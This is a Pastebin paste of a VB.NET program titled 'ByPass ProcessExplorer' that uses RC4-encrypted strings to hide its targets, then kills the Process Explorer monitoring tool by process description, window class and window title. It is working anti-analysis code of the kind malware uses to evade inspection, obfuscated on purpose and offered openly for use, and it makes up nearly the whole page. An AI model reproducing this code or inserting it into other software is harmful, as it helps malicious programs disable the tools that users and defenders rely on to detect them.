API tools faq
paste
Advertisement
IL_Coder

ByPass ProcessExplorer [ By Security.Najaf ]

IL_Coder
Mar 4th, 2014
422
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 4.72 KB | None | 0 0
raw download clone embed print report
  1. Imports System.Runtime.InteropServices
  2. Imports System.Text
  3. Module Module1
  4.     'C0DED BY S4CUR1TY.N4JAF ~
  5.     Public Function rc4(ByVal message As String, ByVal password As String) As String
  6.         Dim i As Integer = 0
  7.         Dim j As Integer = 0
  8.         Dim cipher As New StringBuilder
  9.         Dim returnCipher As String = String.Empty
  10.         Dim sbox As Integer() = New Integer(256) {}
  11.         Dim key As Integer() = New Integer(256) {}
  12.         Dim intLength As Integer = password.Length
  13.         Dim a As Integer = 0
  14.         While a <= 255
  15.             Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0))
  16.             key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp)
  17.             sbox(a) = a
  18.             System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
  19.         End While
  20.         Dim x As Integer = 0
  21.         Dim b As Integer = 0
  22.         While b <= 255
  23.             x = (x + sbox(b) + key(b)) Mod 256
  24.             Dim tempSwap As Integer = sbox(b)
  25.             sbox(b) = sbox(x)
  26.             sbox(x) = tempSwap
  27.             System.Math.Max(System.Threading.Interlocked.Increment(b), b - 1)
  28.         End While
  29.         a = 1
  30.         While a <= message.Length
  31.             Dim itmp As Integer = 0
  32.             i = (i + 1) Mod 256
  33.             j = (j + sbox(i)) Mod 256
  34.             itmp = sbox(i)
  35.             sbox(i) = sbox(j)
  36.             sbox(j) = itmp
  37.             Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256)
  38.             Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0)
  39.             itmp = Asc(ctmp)
  40.             Dim cipherby As Integer = itmp Xor k
  41.             cipher.Append(Chr(cipherby))
  42.             System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
  43.         End While
  44.         returnCipher = cipher.ToString
  45.         cipher.Length = 0
  46.         Return returnCipher
  47.     End Function
  48.     Public Declare Auto Function GetClassName Lib "User32.dll" (ByVal hwnd As IntPtr, _
  49.             <Out()> ByVal lpClassName As System.Text.StringBuilder, _
  50.             ByVal nMaxCount As Integer) As Integer
  51.     Declare Function test Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Int32
  52.     Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Int32, ByVal wMsg As Int32, ByVal _wParam As Int32, ByVal lParam As Int32) As Int32
  53.     Private Const SW_SHOWNORMAL As Integer = 1
  54.     Private Const SW_SHOWMINIMIZED As Integer = 2
  55.     Private Declare Function ShowWindow Lib "user32" (ByVal handle As IntPtr, ByVal nCmdShow As Integer) As Integer
  56.     Private Const SW_SHOWMAXIMIZED As Integer = 3
  57.     Public Declare Function GetWindowTextLength Lib "user32.dll" Alias "GetWindowTextLengthA" _
  58.          (ByVal hWnd As Long) As Long
  59.     Declare Function FindWindow Lib "user32" Alias "FindWindowA" ( _
  60.     ByVal lpClassName As String, _
  61.     ByVal lpWindowName As String _
  62. ) As Long
  63.     Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" ( _
  64.         ByVal hWndParent As Long, _
  65.         ByVal hWndChildAfter As Long, _
  66.         ByVal lpszClassName As String, _
  67.         ByVal lpszWindowName As String _
  68.     ) As Long
  69.     Function GetProcessesByDescription(ByVal description As String) As Process()
  70.         Dim result As New List(Of Process)
  71.         For Each p As Process In Process.GetProcesses
  72.             Try
  73.                 Dim ProcessFile = FileVersionInfo.GetVersionInfo(p.MainModule.FileName)
  74.                 Dim myDescription = ProcessFile.FileDescription
  75.                 If (myDescription = description) Then result.Add(p)
  76.             Catch ex As Exception
  77.             End Try
  78.         Next
  79.         Return result.ToArray()
  80.     End Function
  81.     Sub main()
  82.         Dim SUNProcess() As Process = GetProcessesByDescription(rc4("س€؟C+¦ز¸Z­أہœئ|ل‌<iزك~", "Autoit"))
  83.         For Each pro As Process In SUNProcess
  84.             pro.Kill()
  85.         Next
  86.         Dim ClassName As String = rc4("ش¾…uه", "Autoit")
  87.         Dim WindowHandle As Int32
  88.         Dim ReturnVal As Int32
  89.         Const WM_QUIT = &H12
  90.         Do
  91.             WindowHandle = FindWindow(ClassName, Nothing)
  92.             If WindowHandle Then
  93.                 ReturnVal = PostMessage(WindowHandle, WM_QUIT, 0, 0)
  94.             End If
  95.         Loop Until WindowHandle = 0
  96.         On Error Resume Next
  97.         Dim myProcesses() As Process = Process.GetProcesses
  98.         For Each p As Process In myProcesses
  99.             If p.MainWindowTitle.Contains(rc4("؟ئَzيˆُN‏Vـ{_/%ئZٹc›عs:‚’$Xن~AـwŒذ8Sïفةإط‘ّtؤ„¦", "Autoit")) Then
  100.                 p.CloseMainWindow()
  101.             End If
  102.         Next
  103.         MessageBox.Show("Done Killed : ) | Coded By Security.Najaf")
  104.     End Sub
  105. End Module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!